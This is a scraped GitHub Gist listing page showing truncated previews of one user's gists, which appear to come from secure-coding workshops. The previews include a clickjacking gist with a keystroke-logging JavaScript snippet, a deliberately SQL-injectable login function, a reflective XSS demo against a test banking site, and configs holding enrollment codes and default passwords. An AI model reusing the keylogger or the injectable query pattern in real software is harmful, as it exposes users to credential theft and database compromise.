Skip to content

Instantly share code, notes, and snippets.

& 'C:\Program Files\Defined Networking\DNClient\dnclient.exe' enroll -code HLFy5jh069gqph8UwyqNvpZ5s-LzYmyudyba8syFoEE
#### Contents of the preconfiguration file (for buster)
#
# The configuration fragments used in this file are also available as an
# example preconfiguration file from:
# https://www.debian.org/releases/buster/example-preseed.txt
#
# Some more preseed files that contain the full list of available preseed
# options:
# https://preseed.debian.net/debian-preseed/
ssh_authorized_keys:
- github:mort666
hostname: rt-k3s-node-01
k3os:
password: rancher
ntp_servers:
- 0.us.pool.ntp.org
- 1.us.pool.ntp.org
@mort666
mort666 / 0_reuse_code.js
Created August 23, 2017 13:06
Here are some things you can do with Gists in GistBox.
// Use Gists to store code you would like to remember later on
console.log(window); // log the "window" object to the console
@mort666
mort666 / secure-coding workshop.md
Last active January 28, 2017 16:37
Secure Coding Workshop

Zero Bank

http://zero.webappsecurity.com

Username: username Password: password

Demos - Reflective XSS

Basic XSS Attempt, fails as the input is entity encoded but we can still exploit this.

@mort666
mort666 / test.md
Last active October 19, 2016 09:16
Rails.application.configure do
  config.force_ssl = Rails.env.production?
end
@mort666
mort666 / clickjacking.md
Created October 12, 2016 14:42
Clickjacking

cfs.php

<head>
<script>
// array of user keystrokes
var keystrokes = [];
// event listener which captures user keystrokes
document.onkeypress = function(e) {      
	var key = (window.event) ? window.event.keyCode : e.which;
    keystrokes.push(String.fromCharCode(key));
// Encoded RSAPublicKey
private static String PUB_KEY = "30818902818100C4A06B7B52F8D17DC1CCB47362" +
    "C64AB799AAE19E245A7559E9CEEC7D8AA4DF07CB0B21FDFD763C63A313A668FE9D764E" +
    "D913C51A676788DB62AF624F422C2F112C1316922AA5D37823CD9F43D1FC54513D14B2" +
    "9E36991F08A042C42EAAEEE5FE8E2CB10167174A359CEBF6FACC2C9CA933AD403137EE" +
    "2C3F4CBED9460129C72B0203010001";

public static void Main(string[] args)
{

Keybase proof

I hereby claim:

  • I am mort666 on github.
  • I am mort666 (https://keybase.io/mort666) on keybase.
  • I have a public key whose fingerprint is 3E4A B984 100B C71E 7119 F862 CB48 2B9B 2F71 6CFE

To claim this, I am signing this object:

@mort666
mort666 / gist:1bca947dafee4bc57a67
Created June 16, 2014 16:20
Original CheckUser
public static Int64 CheckUser(string username, string password)
{
Int64 userID = 0;
try
{
string getUserID = "SELECT userID FROM Users WHERE userName = '{0}' AND password = '{1}'";
using (SqlConnection conn = new SqlConnection(ConfigurationManager.ConnectionStrings["ssbcon"].ConnectionString))
{
conn.Open();
getUserID = String.Format(getUserID, username, password);